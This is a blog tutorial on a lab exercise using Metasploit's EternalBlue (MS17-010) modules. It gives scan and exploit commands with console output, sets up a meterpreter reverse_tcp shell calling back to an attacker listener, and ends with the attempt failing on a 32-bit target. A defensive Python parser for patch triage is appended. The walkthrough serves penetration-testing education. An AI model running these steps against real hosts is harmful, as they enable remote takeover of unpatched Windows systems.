MSF Practice - EternalBlue
Start the console with msfconsole:

```
┌──(root㉿kali)-[~]
└─# msfconsole
```
```
       =[ metasploit v6.2.36-dev                          ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use sessions -1 to interact with the last opened session
Metasploit Documentation: https://docs.metasploit.com/

msf6 >
```
2. Search for ms17_010
```
msf6 > search ms17_010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection

Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
```
3. Scan with the module
Scan with the smb_ms17_010 module. An auxiliary module like this one does not establish access between the attacking machine and the target; auxiliary modules only perform scanning, sniffing, fingerprinting and similar functions that support the penetration test.

```
use auxiliary/scanner/smb/smb_ms17_010
```
View the options the module needs configured:

```
show options
```

An option whose Required column on the right is yes must have a value in the Current Setting column on the left, for example RHOSTS.

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.11.132                                                  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.
```
Set the target
The RHOSTS option is the IP address or IP range of the host(s) to probe, for example 192.168.11.125-192.168.11.130 or 192.168.11.0/24.

```
set rhosts 192.168.11.132
```
Check the configured options again:

```
show options
```
Run the scan; the output reports that the host is very likely vulnerable to EternalBlue.

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.11.132:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.11.132:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
4. Attack
Load the exploit module:

```
use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
```
View information about this vulnerability:

```
info
```
List the attackable platforms. This command shows which specific operating system versions and language versions the exploit module targets.
Note: if no target is set, MSF determines the target's OS version and language automatically from the target system's fingerprint.

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target
   1   Windows 7
   2   Windows Embedded Standard 7
   3   Windows Server 2008 R2
   4   Windows 8
   5   Windows 8.1
   6   Windows Server 2012
   7   Windows 10 Pro
   8   Windows 10 Enterprise Evaluation
```
List the payloads (this command shows all payloads available for the current exploit module).
Note: a payload is the code that carries out the intended attack functionality on the target system after exploitation; once the target has been compromised, it is used to run arbitrary commands on the target system.

```
show payloads
```
Set the payload:

```
set payload windows/x64/meterpreter/reverse_tcp
```
Check the configured options:

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.11.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.
```
Set the target IP.
Note: separate multiple target IPs with spaces.

```
set rhosts 192.168.11.132
```
Set the address that will receive the shell called back from the target machine:

```
set LHOST 192.168.11.128
```
Note: either exploit or run launches the attack.
Launch the attack; here the attack on the lab target fails =_= (the output shows that this module only supports x64 targets, while the target is 32-bit Windows Server 2003).

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.11.128:4444
[*] 192.168.11.132:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.11.132:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.11.132:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.11.132:445 - The target is vulnerable.
[-] 192.168.11.132:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
```
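A small triage helper for the scanner output in section 3 and the exploit output above, added here as an example (it is not part of the original post or of Metasploit): it parses the smb_ms17_010 result lines into per-host records and records any exploit abort line separately, so that a failed exploit run, like the x86 host in this post, is not mistaken for a patched host. The 192.168.11.140 host and its OS string in the sample are constructed.

```python
import re

# Constructed sample console output. The first three lines are copied from this
# post's scan and exploit runs; the 192.168.11.140 host is made up.
SAMPLE_CONSOLE = """\
[+] 192.168.11.132:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.11.132:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.11.132:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[+] 192.168.11.140:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
"""

# The scanner's positive result: host, port, OS fingerprint and architecture.
VULN_RE = re.compile(
    r"^\[\+\] (?P<host>[\d.]+):(?P<port>\d+) - Host is likely VULNERABLE to MS17-010! - "
    r"(?P<os>.+?) (?P<arch>x86|x64) \((?:32|64)-bit\)$"
)
# The exploit module's abort line; the reason text is kept verbatim.
FAIL_RE = re.compile(
    r"^\[-\] (?P<host>[\d.]+):(?P<port>\d+) - Exploit aborted due to failure: (?P<reason>.+)$"
)

def parse_console(text):
    """Return {host: record} for every host the scanner flagged as vulnerable."""
    hosts = {}
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if m:
            hosts[m["host"]] = {"port": int(m["port"]), "os": m["os"],
                                "arch": m["arch"], "exploit_failure": None}
            continue
        m = FAIL_RE.match(line)
        if m and m["host"] in hosts:
            hosts[m["host"]]["exploit_failure"] = m["reason"]
    return hosts

def patch_report(hosts):
    """One (host, os, arch, note) row per flagged host. A module-side abort such
    as 'no-target' only changes the note: the host still needs the patch."""
    rows = []
    for host, rec in sorted(hosts.items()):
        if rec["exploit_failure"]:
            note = "exploit module aborted (%s); still needs MS17-010 patch" % rec["exploit_failure"]
        else:
            note = "flagged by scanner; needs MS17-010 patch"
        rows.append((host, rec["os"], rec["arch"], note))
    return rows

if __name__ == "__main__":
    for row in patch_report(parse_console(SAMPLE_CONSOLE)):
        print(" | ".join(row))
```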
Author: HKalpa
Link: https://www.cnblogs.com/HKalpa/p/17220019.html
Copyright notice: All operations in this work were carried out in a lab environment; anyone who uses them for other purposes bears the consequences, and the author assumes no responsibility. This work is licensed under a China Mainland license agreement.